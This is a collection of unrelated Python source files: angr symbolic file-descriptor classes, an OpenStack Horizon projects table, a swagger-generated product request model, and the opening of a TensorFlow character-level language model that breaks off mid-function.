new_pos = self._pos + offset
elif whence == 'end':
new_pos = self.file.size + offset
else:
raise SimFileError("Invalid whence value %r passed to seek" % whence)
success_condition = self.state.solver.And(self.state.solver.SGE(new_pos, 0), self.state.solver.SLE(new_pos, self.file.size))
self._pos = _deps_unpack(self.state.solver.If(success_condition, new_pos, self._pos))[0]
return success_condition
def eof(self):
if not self.file.seekable:
return claripy.false
if not getattr(self.file, 'has_end', True):
return claripy.false
return self._pos == self.file.size
def tell(self):
if not self.file.seekable:
return None
return self._pos
def size(self):
return self.file.size
def concretize(self, **kwargs):
"""
Return a concretization of the underlying file. Returns whatever format is preferred by the file.
"""
return self.file.concretize(**kwargs)
@property
def read_storage(self):
return self.file
@property
def write_storage(self):
return self.file
@property
def read_pos(self):
if self.file.pos is not None:
return self.file.pos
return self._pos
@property
def write_pos(self):
if self.file.pos is not None:
return self.file.pos
return self._pos
def set_state(self, state):
self.file.set_state(state)
super(SimFileDescriptor, self).set_state(state)
@SimStatePlugin.memo
def copy(self, memo):
c = SimFileDescriptor(self.file.copy(memo), self.flags)
c._pos = self._pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
# do NOT merge file content - descriptors do not have ownership, prevent duplicate merging
if not all(type(o) is type(self) for o in others):
l.error("Cannot merge SimFileDescriptors of disparate types")
return False
if not all(o.flags == self.flags for o in others):
l.error("Cannot merge SimFileDescriptors of disparate flags")
return False
if type(self._pos) is int and all(type(o._pos) is int for o in others):
# TODO: we can do slightly better for packet-based things by having some packets have a "guard condition"
# which makes them zero length if they're not merged in
if any(o._pos != self._pos for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors over SimPackets with disparate number of packets")
elif self._pos is None and all(o._pos is None for o in others):
pass
elif self._pos is None or any(o._pos is None for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors with inconsistent None-position - please report this!")
else:
self._pos = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._pos for o in others)), self._pos)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
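# Illustrative usage sketch (an assumption, not from the original module): a SimFileDescriptor is
# normally obtained through the POSIX plugin rather than constructed by hand. Assuming an angr
# SimState `state` with its default filesystem, usage looks roughly like:
#
#     fd_num = state.posix.open(b'/tmp/input.txt', Flags.O_RDONLY)
#     fd = state.posix.get_fd(fd_num)
#     data, realsize = fd.read_data(0x20)      # forwarded to the backing SimFile
#     ok = fd.seek(0, whence='start')          # symbolic boolean describing success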
class SimFileDescriptorDuplex(SimFileDescriptorBase):
"""
A file descriptor that refers to two file storage mechanisms, one to read from and one to write to. As a result,
operations like seek, eof, etc no longer make sense.
:param read_file: The SimFile to read from
:param write_file: The SimFile to write to
"""
def __init__(self, read_file, write_file):
super(SimFileDescriptorDuplex, self).__init__()
self._read_file = read_file
self._write_file = write_file
self._read_pos = 0
self._write_pos = 0
def read_data(self, size, **kwargs):
size = self._prep_read(size)
data, realsize, self._read_pos = self._read_file.read(self._read_pos, size)
return data, realsize
def write_data(self, data, size=None, **kwargs):
data = _deps_unpack(data)[0]
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
size = self._prep_write(size)
self._write_pos = self._write_file.write(self._write_pos, data, size)
return size
def set_state(self, state):
self._read_file.set_state(state)
self._write_file.set_state(state)
super(SimFileDescriptorDuplex, self).set_state(state)
def eof(self):
# the thing that makes the most sense is for this to refer to the read eof status...
if not self._read_file.seekable:
return claripy.false
if not getattr(self._read_file, 'has_end', True):
return claripy.false
return self._read_pos == self._read_file.size
def tell(self):
return None
def seek(self, offset, whence='start'):
return claripy.false
def size(self):
return None
def concretize(self, **kwargs):
"""
Return a concretization of the underlying files, as a tuple of (read file, write file).
"""
return (self._read_file.concretize(**kwargs), self._write_file.concretize(**kwargs))
@property
def read_storage(self):
return self._read_file
@property
def write_storage(self):
return self._write_file
@property
def read_pos(self):
if self._read_file.pos is not None:
return self._read_file.pos
return self._read_pos
@property
def write_pos(self):
if self._write_file.pos is not None:
return self._write_file.pos
return self._write_pos
@SimStatePlugin.memo
def copy(self, memo):
c = SimFileDescriptorDuplex(self._read_file.copy(memo), self._write_file.copy(memo))
c._read_pos = self._read_pos
c._write_pos = self._write_pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
# do NOT merge storage mechanisms here - fs and posix handle that
if not all(type(o) is type(self) for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors of disparate types")
if type(self._read_pos) is int and all(type(o._read_pos) is int for o in others):
if any(o._read_pos != self._read_pos for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors over SimPackets with disparate number of packets")
elif self._read_pos is None and all(o._read_pos is None for o in others):
pass
elif self._read_pos is None or any(o._read_pos is None for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors with inconsistent None-position - please report this!")
else:
self._read_pos = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._read_pos for o in others)), self._read_pos)
if type(self._write_pos) is int and all(type(o._write_pos) is int for o in others):
if any(o._write_pos != self._write_pos for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors over SimPackets with disparate number of packets")
elif self._write_pos is None and all(o._write_pos is None for o in others):
pass
elif self._write_pos is None or any(o._write_pos is None for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors with inconsistent None-position - please report this!")
else:
self._write_pos = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._write_pos for o in others)), self._write_pos)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
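# Illustrative sketch (an assumption, not from the original module): a duplex descriptor is the
# natural fit for stdin/stdout-style fds, where reads and writes hit two different SimFiles:
#
#     duplex = SimFileDescriptorDuplex(stdin_file, stdout_file)
#     data, realsize = duplex.read_data(16)    # pulled from stdin_file
#     duplex.write_data(data, realsize)        # pushed to stdout_file
#     duplex.seek(0)                           # always claripy.false - seeking makes no sense here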
class SimPacketsSlots(SimFileBase):
"""
SimPacketsSlots is the new SimDialogue, if you've ever seen that before.
The idea is that in some cases, the only thing you really care about is getting the lengths of reads right, and
some of them should be short reads, and some of them should be truncated. You provide to this class a list of read
lengths, and it figures out the length of each read, and delivers some content.
This class will NOT respect the position argument you pass it - this storage is not stateless.
"""
seekable = False
def __init__(self, name, read_sizes, ident=None, **kwargs):
super(SimPacketsSlots, self).__init__(name, writable=False, ident=ident)
self.read_sizes = read_sizes
self.read_data = []
def concretize(self, **kwargs):
return [self.state.solver.eval(var, cast_to=bytes, **kwargs) for var in self.read_data]
def read(self, pos, size, **kwargs):
if not self.read_sizes:
return self.state.BVV(0, 0), 0, None
try:
req_size = self.state.solver.eval_one(size)
except SimSolverError:
raise SimFileError("SimPacketsSlots can't handle multivalued read sizes")
avail_size = self.read_sizes[0]
if avail_size > req_size:
# chop the packet in half
real_size = req_size
self.read_sizes[0] -= req_size
else:
# short read or full size read
real_size = avail_size
self.read_sizes.pop(0)
data = self.state.solver.BVS('packet_%d_%s' % (len(self.read_data), self.ident), real_size*self.state.arch.byte_width, key=('file', self.ident, 'packet', len(self.read_data)))
self.read_data.append(data)
return data, real_size, None
def write(self, pos, data, size=None, **kwargs):
raise SimFileError("Trying to write to SimPacketsSlots? Illegal")
@property
def size(self):
return sum(len(x) for x in self.read_data) // self.state.arch.byte_width
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
o = SimPacketsSlots(self.name, self.read_sizes, ident=self.ident)
o.read_data = list(self.read_data)
return o
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
if any(self.read_sizes != o.read_sizes for o in others):
raise SimMergeError("Can't merge SimPacketsSlots with disparate reads")
already_read_sizes = [len(x) for x in self.read_data]
if any(already_read_sizes != [len(x) for x in o.read_data] for o in others):
raise SimMergeError("Can't merge SimPacketsSlots with disparate reads")
for i, default_var in enumerate(self.read_data):
self.read_data[i] = self.state.solver.ite_cases(zip(merge_conditions[1:], [o.read_data[i] for o in others]), default_var)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
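# Illustrative sketch (an assumption, not from the original module): SimPacketsSlots only models
# read lengths, so it is configured up front with the size each read slot should provide
# (assuming the file has been given a state via set_state):
#
#     slots = SimPacketsSlots('stdin', [32, 32, 8], ident='stdin')
#     data, real_size, _ = slots.read(0, 40)   # capped at 32: a short read of the first slot
#     data, real_size, _ = slots.read(0, 16)   # splits the second slot, 16 bytes of it remain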
from ..errors import SimMergeError, SimFileError, SimSolverError
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.exceptions import ValidationError # noqa
from django.core.urlresolvers import reverse
from django.template import defaultfilters as filters
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from openstack_auth import utils as auth_utils
from horizon import exceptions
from horizon import forms
from horizon import tables
from keystoneclient.exceptions import Conflict # noqa
from openstack_dashboard import api
from openstack_dashboard import policy
class RescopeTokenToProject(tables.LinkAction):
name = "rescope"
verbose_name = _("Set as Active Project")
url = "switch_tenants"
def allowed(self, request, project):
# allow rescoping the token to any project the user has a role on
# (authorized_tenants), and that they are not currently scoped to
return next((True for proj in request.user.authorized_tenants
if proj.id == project.id and
project.id != request.user.project_id), False)
def get_link_url(self, project):
# redirects to the switch_tenants url which then will redirect
# back to this page
dash_url = reverse("horizon:identity:projects:index")
base_url = reverse(self.url, args=[project.id])
param = urlencode({"next": dash_url})
return "?".join([base_url, param])
class UpdateMembersLink(tables.LinkAction):
name = "users"
verbose_name = _("Manage Members")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:list_users"),
("identity", "identity:list_roles"))
def get_link_url(self, project):
step = 'update_members'
base_url = reverse(self.url, args=[project.id])
param = urlencode({"step": step})
return "?".join([base_url, param])
class UpdateGroupsLink(tables.LinkAction):
name = "groups"
verbose_name = _("Modify Groups")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:list_groups"),)
def allowed(self, request, project):
return api.keystone.VERSIONS.active >= 3
def get_link_url(self, project):
step = 'update_group_members'
base_url = reverse(self.url, args=[project.id])
param = urlencode({"step": step})
return "?".join([base_url, param])
class UsageLink(tables.LinkAction):
name = "usage"
verbose_name = _("View Usage")
url = "horizon:identity:projects:usage"
icon = "stats"
policy_rules = (("compute", "compute_extension:simple_tenant_usage:show"),)
def allowed(self, request, project):
return request.user.is_superuser
class CreateProject(tables.LinkAction):
name = "create"
verbose_name = _("Create Project")
url = "horizon:identity:projects:create"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (('identity', 'identity:create_project'),)
def allowed(self, request, project):
return api.keystone.keystone_can_edit_project()
class UpdateProject(tables.LinkAction):
name = "update"
verbose_name = _("Edit Project")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (('identity', 'identity:update_project'),)
def allowed(self, request, project):
return api.keystone.keystone_can_edit_project()
class ModifyQuotas(tables.LinkAction):
name = "quotas"
verbose_name = _("Modify Quotas")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (('compute', "compute_extension:quotas:update"),)
def get_link_url(self, project):
step = 'update_quotas'
base_url = reverse(self.url, args=[project.id])
param = urlencode({"step": step})
return "?".join([base_url, param])
class DeleteTenantsAction(tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Project",
u"Delete Projects",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted Project",
u"Deleted Projects",
count
)
policy_rules = (("identity", "identity:delete_project"),)
def allowed(self, request, project):
return api.keystone.keystone_can_edit_project()
def delete(self, request, obj_id):
api.keystone.tenant_delete(request, obj_id)
def handle(self, table, request, obj_ids):
response = \
super(DeleteTenantsAction, self).handle(table, request, obj_ids)
auth_utils.remove_project_cache(request.user.token.id)
return response
class TenantFilterAction(tables.FilterAction):
def filter(self, table, tenants, filter_string):
"""Really naive case-insensitive search."""
# FIXME(gabriel): This should be smarter. Written for demo purposes.
q = filter_string.lower()
def comp(tenant):
if q in tenant.name.lower():
return True
return False
return filter(comp, tenants)
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, project_id):
project_info = api.keystone.tenant_get(request, project_id,
admin=True)
return project_info
class UpdateCell(tables.UpdateAction):
def allowed(self, request, project, cell):
policy_rule = (("identity", "identity:update_project"),)
return (
(cell.column.name != 'enabled' or
request.user.token.project['id'] != cell.datum.id) and
api.keystone.keystone_can_edit_project() and
policy.check(policy_rule, request))
def update_cell(self, request, datum, project_id,
cell_name, new_cell_value):
# inline update project info
try:
project_obj = datum
# update the changed attribute with the new value
setattr(project_obj, cell_name, new_cell_value)
api.keystone.tenant_update(
request,
project_id,
name=project_obj.name,
description=project_obj.description,
enabled=project_obj.enabled)
except Conflict:
# Return a nicer error message about the name conflict. The message
# from the exception is not that clear for users.
message = _("This name is already taken.")
raise ValidationError(message)
except Exception:
exceptions.handle(request, ignore=True)
return False
return True
class TenantsTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Name'),
link=("horizon:identity:projects:detail"),
form_field=forms.CharField(max_length=64),
update_action=UpdateCell)
description = tables.Column(lambda obj: getattr(obj, 'description', None),
verbose_name=_('Description'),
form_field=forms.CharField(
widget=forms.Textarea(attrs={'rows': 4}),
required=False),
update_action=UpdateCell)
id = tables.Column('id', verbose_name=_('Project ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'), status=True,
filters=(filters.yesno, filters.capfirst),
form_field=forms.BooleanField(
label=_('Enabled'),
required=False),
update_action=UpdateCell)
class Meta(object):
name = "tenants"
verbose_name = _("Projects")
row_class = UpdateRow
row_actions = (UpdateMembersLink, UpdateGroupsLink, UpdateProject,
UsageLink, ModifyQuotas, DeleteTenantsAction,
RescopeTokenToProject)
table_actions = (TenantFilterAction, CreateProject,
DeleteTenantsAction)
pagination_param = "tenant_marker"
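# Illustrative sketch (an assumption, not part of the original module): a table such as
# TenantsTable is typically rendered by a DataTableView subclass in the panel's views.py,
# roughly like the following (template path is hypothetical):
#
#     class IndexView(tables.DataTableView):
#         table_class = TenantsTable
#         template_name = 'identity/projects/index.html'
#
#         def get_data(self):
#             # keystone's tenant_list returns (projects, has_more_data)
#             return api.keystone.tenant_list(self.request)[0]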
|
|
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class CreateProductRequest(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, name=None, description_short=None, description=None, meta_title=None, meta_description=None, meta_keywords=None, link_rewrite=None, active=None, reference=None, date_from=None, date_to=None, availability_before=None, availability_after=None, id_category_default=None, tags=None):
"""
CreateProductRequest - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'list[I18nFieldInput]',
'description_short': 'list[I18nFieldInput]',
'description': 'list[I18nFieldInput]',
'meta_title': 'list[I18nFieldInput]',
'meta_description': 'list[I18nFieldInput]',
'meta_keywords': 'list[I18nFieldInput]',
'link_rewrite': 'list[I18nFieldInput]',
'active': 'bool',
'reference': 'str',
'date_from': 'str',
'date_to': 'str',
'availability_before': 'int',
'availability_after': 'int',
'id_category_default': 'int',
'tags': 'list[I18nField]'
}
self.attribute_map = {
'name': 'name',
'description_short': 'description_short',
'description': 'description',
'meta_title': 'meta_title',
'meta_description': 'meta_description',
'meta_keywords': 'meta_keywords',
'link_rewrite': 'link_rewrite',
'active': 'active',
'reference': 'reference',
'date_from': 'date_from',
'date_to': 'date_to',
'availability_before': 'availability_before',
'availability_after': 'availability_after',
'id_category_default': 'id_category_default',
'tags': 'tags'
}
self._name = name
self._description_short = description_short
self._description = description
self._meta_title = meta_title
self._meta_description = meta_description
self._meta_keywords = meta_keywords
self._link_rewrite = link_rewrite
self._active = active
self._reference = reference
self._date_from = date_from
self._date_to = date_to
self._availability_before = availability_before
self._availability_after = availability_after
self._id_category_default = id_category_default
self._tags = tags
@property
def name(self):
"""
Gets the name of this CreateProductRequest.
:return: The name of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this CreateProductRequest.
:param name: The name of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`")
self._name = name
@property
def description_short(self):
"""
Gets the description_short of this CreateProductRequest.
:return: The description_short of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._description_short
@description_short.setter
def description_short(self, description_short):
"""
Sets the description_short of this CreateProductRequest.
:param description_short: The description_short of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._description_short = description_short
@property
def description(self):
"""
Gets the description of this CreateProductRequest.
:return: The description of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this CreateProductRequest.
:param description: The description of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._description = description
@property
def meta_title(self):
"""
Gets the meta_title of this CreateProductRequest.
:return: The meta_title of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._meta_title
@meta_title.setter
def meta_title(self, meta_title):
"""
Sets the meta_title of this CreateProductRequest.
:param meta_title: The meta_title of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._meta_title = meta_title
@property
def meta_description(self):
"""
Gets the meta_description of this CreateProductRequest.
:return: The meta_description of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._meta_description
@meta_description.setter
def meta_description(self, meta_description):
"""
Sets the meta_description of this CreateProductRequest.
:param meta_description: The meta_description of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._meta_description = meta_description
@property
def meta_keywords(self):
"""
Gets the meta_keywords of this CreateProductRequest.
:return: The meta_keywords of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._meta_keywords
@meta_keywords.setter
def meta_keywords(self, meta_keywords):
"""
Sets the meta_keywords of this CreateProductRequest.
:param meta_keywords: The meta_keywords of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._meta_keywords = meta_keywords
@property
def link_rewrite(self):
"""
Gets the link_rewrite of this CreateProductRequest.
:return: The link_rewrite of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._link_rewrite
@link_rewrite.setter
def link_rewrite(self, link_rewrite):
"""
Sets the link_rewrite of this CreateProductRequest.
:param link_rewrite: The link_rewrite of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
if link_rewrite is None:
raise ValueError("Invalid value for `link_rewrite`, must not be `None`")
self._link_rewrite = link_rewrite
@property
def active(self):
"""
Gets the active of this CreateProductRequest.
:return: The active of this CreateProductRequest.
:rtype: bool
"""
return self._active
@active.setter
def active(self, active):
"""
Sets the active of this CreateProductRequest.
:param active: The active of this CreateProductRequest.
:type: bool
"""
self._active = active
@property
def reference(self):
"""
Gets the reference of this CreateProductRequest.
:return: The reference of this CreateProductRequest.
:rtype: str
"""
return self._reference
@reference.setter
def reference(self, reference):
"""
Sets the reference of this CreateProductRequest.
:param reference: The reference of this CreateProductRequest.
:type: str
"""
self._reference = reference
@property
def date_from(self):
"""
Gets the date_from of this CreateProductRequest.
:return: The date_from of this CreateProductRequest.
:rtype: str
"""
return self._date_from
@date_from.setter
def date_from(self, date_from):
"""
Sets the date_from of this CreateProductRequest.
:param date_from: The date_from of this CreateProductRequest.
:type: str
"""
self._date_from = date_from
@property
def date_to(self):
"""
Gets the date_to of this CreateProductRequest.
:return: The date_to of this CreateProductRequest.
:rtype: str
"""
return self._date_to
@date_to.setter
def date_to(self, date_to):
"""
Sets the date_to of this CreateProductRequest.
:param date_to: The date_to of this CreateProductRequest.
:type: str
"""
self._date_to = date_to
@property
def availability_before(self):
"""
Gets the availability_before of this CreateProductRequest.
Value can be 0, 1 or 2
:return: The availability_before of this CreateProductRequest.
:rtype: int
"""
return self._availability_before
@availability_before.setter
def availability_before(self, availability_before):
"""
Sets the availability_before of this CreateProductRequest.
Value can be 0, 1 or 2
:param availability_before: The availability_before of this CreateProductRequest.
:type: int
"""
self._availability_before = availability_before
@property
def availability_after(self):
"""
Gets the availability_after of this CreateProductRequest.
Value can be 0, 1 or 2
:return: The availability_after of this CreateProductRequest.
:rtype: int
"""
return self._availability_after
@availability_after.setter
def availability_after(self, availability_after):
"""
Sets the availability_after of this CreateProductRequest.
Value can be 0, 1 or 2
:param availability_after: The availability_after of this CreateProductRequest.
:type: int
"""
self._availability_after = availability_after
@property
def id_category_default(self):
"""
Gets the id_category_default of this CreateProductRequest.
:return: The id_category_default of this CreateProductRequest.
:rtype: int
"""
return self._id_category_default
@id_category_default.setter
def id_category_default(self, id_category_default):
"""
Sets the id_category_default of this CreateProductRequest.
:param id_category_default: The id_category_default of this CreateProductRequest.
:type: int
"""
if id_category_default is None:
raise ValueError("Invalid value for `id_category_default`, must not be `None`")
self._id_category_default = id_category_default
@property
def tags(self):
"""
Gets the tags of this CreateProductRequest.
:return: The tags of this CreateProductRequest.
:rtype: list[I18nField]
"""
return self._tags
@tags.setter
def tags(self, tags):
"""
Sets the tags of this CreateProductRequest.
:param tags: The tags of this CreateProductRequest.
:type: list[I18nField]
"""
self._tags = tags
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
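# Illustrative usage sketch (an assumption, not part of the generated module): the model mirrors
# the JSON body expected by the server API, so a payload can be built and serialized like this
# (all field values below are made up):
#
#     req = CreateProductRequest(
#         name=[{'id_lang': 1, 'value': 'T-shirt'}],        # normally I18nFieldInput instances
#         link_rewrite=[{'id_lang': 1, 'value': 't-shirt'}],
#         id_category_default=2,
#         active=True)
#     payload = req.to_dict()   # plain dict, ready to be JSON-encoded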
|
|
# coding=utf-8
# TODO: Not yet implemented!
"""
The model for the character level speech recognizer.
Based on the paper:
http://arxiv.org/pdf/1601.06581v2.pdf
This model is:
character level RNN-LM
"""
import tensorflow as tf
from tensorflow.python.client import timeline
import numpy as np
import time
import os
from datetime import datetime
import logging
from random import randint
import util.dataprocessor as dataprocessor
class LanguageModel(object):
def __init__(self, num_layers, hidden_size, batch_size, max_input_seq_length,
max_target_seq_length, input_dim):
"""
Character level language model to help with language model predictions
Uses LSTM cells in a deep RNN
Parameters
----------
:param num_layers: number of lstm layers
:param hidden_size: size of hidden layers
:param batch_size: number of training examples fed at once
:param max_input_seq_length: maximum length of input vector sequence
:param max_target_seq_length: maximum length of output vector sequence
:param input_dim: dimension of input vector
"""
# Store model's parameters
self.num_layers = num_layers
self.hidden_size = hidden_size
self.batch_size = batch_size
self.max_input_seq_length = max_input_seq_length
self.max_target_seq_length = max_target_seq_length
self.input_dim = input_dim
# Output vector has the same dimension as the input
self.num_labels = input_dim
# Create object's variables for tensorflow ops
self.rnn_state_zero_op = None
self.rnn_keep_state_op = None
self.saver_op = None
# Create object's variable for result output
self.prediction = None
# Create object's variables for placeholders
self.input_keep_prob_ph = self.output_keep_prob_ph = None
self.inputs_ph = self.input_seq_lengths_ph = self.labels_ph = None
# Create object's variables for dataset's iterator input
self.iterator_get_next_op = None
self.is_training_var = tf.Variable(initial_value=False, trainable=False, name="is_training_var", dtype=tf.bool)
# Create object's variable for hidden state
self.rnn_tuple_state = None
# Create object's variables for training
self.input_keep_prob = self.output_keep_prob = None
self.global_step = None
self.learning_rate_var = None
# Create object variables for tensorflow training's ops
self.learning_rate_decay_op = None
self.accumulated_mean_loss = self.acc_mean_loss_op = self.acc_mean_loss_zero_op = None
self.accumulated_error_rate = self.acc_error_rate_op = self.acc_error_rate_zero_op = None
self.mini_batch = self.increase_mini_batch_op = self.mini_batch_zero_op = None
self.acc_gradients_zero_op = self.accumulate_gradients_op = None
self.train_step_op = None
# Create object's variables for tensorboard
self.tensorboard_dir = None
self.timeline_enabled = False
self.train_summaries_op = None
self.test_summaries_op = None
self.summary_writer_op = None
# Create object's variables for status checking
self.rnn_created = False
def create_forward_rnn(self):
"""
Create the forward-only RNN
Parameters
-------
:return: the logits
"""
if self.rnn_created:
logging.fatal("Trying to create the language RNN but it is already.")
# Set placeholders for input
self.inputs_ph = tf.placeholder(tf.float32, shape=[self.max_input_seq_length, None, self.input_dim],
name="inputs_ph")
self.input_seq_lengths_ph = tf.placeholder(tf.int32, shape=[None], name="input_seq_lengths_ph")
# Build the RNN
self.global_step, logits, self.prediction, self.rnn_keep_state_op, self.rnn_state_zero_op, \
_, _, self.rnn_tuple_state = self._build_base_rnn(self.inputs_ph, self.input_seq_lengths_ph, True)
# Add the saving and restore operation
self.saver_op = self._add_saving_op()
return logits
def create_training_rnn(self, input_keep_prob, output_keep_prob, grad_clip, learning_rate, lr_decay_factor,
use_iterator=False):
"""
Create the training RNN
Parameters
----------
:param input_keep_prob: probability of keeping input signal for a cell during training
:param output_keep_prob: probability of keeping output signal from a cell during training
:param grad_clip: max gradient size (prevent exploding gradients)
:param learning_rate: learning rate parameter fed to optimizer
:param lr_decay_factor: decay factor of the learning rate
:param use_iterator: if True then plug an iterator.get_next() operation in as the input of the model; if False,
placeholders are created instead
"""
if self.rnn_created:
logging.fatal("Trying to create the language RNN but it is already.")
# Store model parameters
self.input_keep_prob = input_keep_prob
self.output_keep_prob = output_keep_prob
if use_iterator is True:
text_batch, input_lengths, label_batch = self.iterator_get_next_op
# Pad if the batch is not complete
padded_text_batch = tf.pad(text_batch, [[0, self.batch_size - tf.size(input_lengths)], [0, 0], [0, 0]])
# Transpose padded_text_batch in order to get the time series as the first dimension
# [batch_size, time_series, input_dim] ====> [time_series, batch_size, input_dim]
inputs = tf.transpose(padded_text_batch, perm=[1, 0, 2])
# Pad input_seq_lengths if the batch is not complete
input_seq_lengths = tf.pad(input_lengths, [[0, self.batch_size - tf.size(input_lengths)]])
# Label tensor must be provided as a sparse tensor.
sparse_labels = tf.SparseTensor(label_batch[0], label_batch[1], [self.batch_size, label_batch[2][1]])
# Pad sparse_labels if the batch is not complete
sparse_labels, _ = tf.sparse_fill_empty_rows(sparse_labels, self.num_labels - 1)
else:
# Set placeholders for input
self.inputs_ph = tf.placeholder(tf.int32, shape=[self.max_input_seq_length, None, self.input_dim],
name="inputs_ph")
self.input_seq_lengths_ph = tf.placeholder(tf.int32, shape=[None], name="input_seq_lengths_ph")
self.labels_ph = tf.placeholder(tf.int32, shape=[None, self.max_target_seq_length],
name="labels_ph")
inputs = self.inputs_ph
input_seq_lengths = self.input_seq_lengths_ph
label_batch = self.labels_ph
# Label tensor must be provided as a sparse tensor.
# First get indexes from non-zero positions
idx = tf.where(tf.not_equal(label_batch, 0))
# Then build a sparse tensor from indexes
sparse_labels = tf.SparseTensor(idx, tf.gather_nd(label_batch, idx),
[self.batch_size, self.max_target_seq_length])
self.global_step, logits, prediction, self.rnn_keep_state_op, self.rnn_state_zero_op, self.input_keep_prob_ph, \
self.output_keep_prob_ph, self.rnn_tuple_state = self._build_base_rnn(inputs, input_seq_lengths, False)
# Add the train part to the network
self.learning_rate_var = self._add_training_on_rnn(logits, grad_clip, learning_rate, lr_decay_factor,
sparse_labels, input_seq_lengths, prediction)
# Add the saving and restore operation
self.saver_op = self._add_saving_op()
def _build_base_rnn(self, inputs, input_seq_lengths, forward_only=True):
"""
Build the Language RNN
Parameters
----------
:param inputs: inputs to the RNN
:param input_seq_lengths: vector containing the length of each input from 'inputs'
:param forward_only: whether the RNN will be used for training or not (if true then add a dropout layer)
Returns
----------
:returns logits: each char probability for each timestep of the input, for each item of the batch
:returns prediction: the best prediction for the input
:returns rnn_keep_state_op: a tensorflow op to save the RNN internal state for the next batch
:returns rnn_state_zero_op: a tensorflow op to reset the RNN internal state to zeros
:returns input_keep_prob_ph: a placeholder for input_keep_prob of the dropout layer
(None if forward_only is True)
:returns output_keep_prob_ph: a placeholder for output_keep_prob of the dropout layer
(None if forward_only is True)
:returns rnn_tuple_state: the RNN internal state
"""
# Define a variable to keep track of the learning process step
global_step = tf.Variable(0, trainable=False, name='global_step')
# If building the RNN for training then create dropout rate placeholders
input_keep_prob_ph = output_keep_prob_ph = None
if not forward_only:
with tf.name_scope('dropout'):
# Create placeholders, used to override values when running on the test set
input_keep_prob_ph = tf.placeholder(tf.float32)
output_keep_prob_ph = tf.placeholder(tf.float32)
# Define cells of language model
with tf.variable_scope('LSTM'):
# Create each layer
layers_list = []
for _ in range(self.num_layers):
cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, state_is_tuple=True)
# If building the RNN for training then add a dropoutWrapper to the cells
if not forward_only:
with tf.name_scope('dropout'):
